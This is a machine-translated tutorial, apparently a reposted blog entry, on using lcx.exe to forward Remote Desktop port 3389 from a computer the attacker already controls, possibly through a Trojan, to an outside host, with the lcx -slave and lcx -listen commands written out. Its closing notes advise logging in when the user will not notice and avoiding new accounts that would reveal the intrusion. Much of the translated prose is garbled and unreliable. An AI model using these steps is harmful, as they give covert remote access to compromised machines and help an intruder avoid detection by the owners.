LCX carried out within the network using port forwarding

Lcx.exe is a port forwarding tool, which is equivalent to 3389 forwarded to the B machine with external network ip address (that is, our own host or have control of the host) A port on the target server so that links B Machine 3389 3389 a link is equivalent to a machine, Lcx when the program is used for controlling a computer in the network, the control unit may be a Trojan horse program, even though it can be controlled, but still did not use the remote terminal to log on to this machine for management convenience, therefore, in many cases, they are trying to open the port 3389 in the computer to be controlled, and then through the port forwarding lcx the like, and further connected locally to the remote terminal and the control computer management and use.

1. determine the IP address of the computer to be controlled

ipconfig / all view the network configuration, for example, to an IP controlled computer 192.168.80.129

2, performs port forwarding command on a computer controlled

On the control computer (A machine) performs lcx -slave 218.69.13.35 51 192.168.80.129 3389, after completion of execution will give some hints. As shown below:

                                             1

Description:

lcx a total of three commands, the first command (lcx -listen 51 3389) (3389 can be set to an arbitrary port number is not used) is performed with (i.e., machine B) on the external network IP separate computer, the machine is shown in 51 listening on port, which is accepted by the main control computer 3389 over the data forwarding; second command (lcx -slave 218.69.13.35 51 192.168.80.129 3389) shows a local IP address of 192.168.80.129 port 3389 forwarded to the remote address of 218.69.13.35 port 51; third steering imperative port.

3. Run listens for commands on this machine

Performed under native command cmd lcx -listen 51 3389, the port monitor 51, the monitor successful, would display as follows:

                                             1

note:

(1) in the machine listening port must be unused, can be used netstat -an | find "51" command to view, if the result is not displayed showing the port 51 may be used for monitoring.

(2) the control computer and the machine is successfully established connection will continue to display the connection data, and if the transmission data does not appear case of acceptance, the connection establishment fails. As shown below:

                                             1

4. Use the remote terminal to log in the machine

After opening the remote terminal connector, 127.0.0.1 input connection, remote access to the desktop computer to be controlled,

                                             1

Note:
(1) if the controlled computer room server, you can log in at the time of landing directly; if the control room windows computer system, the computer user is not the best choice for the time of landing, or likely to be found;

(2) Do not build on a computer account to be controlled, especially windows, after the establishment of the account, the login screen will be displayed immediately.

Guess you like

Origin www.cnblogs.com/kuaile1314/p/11606741.html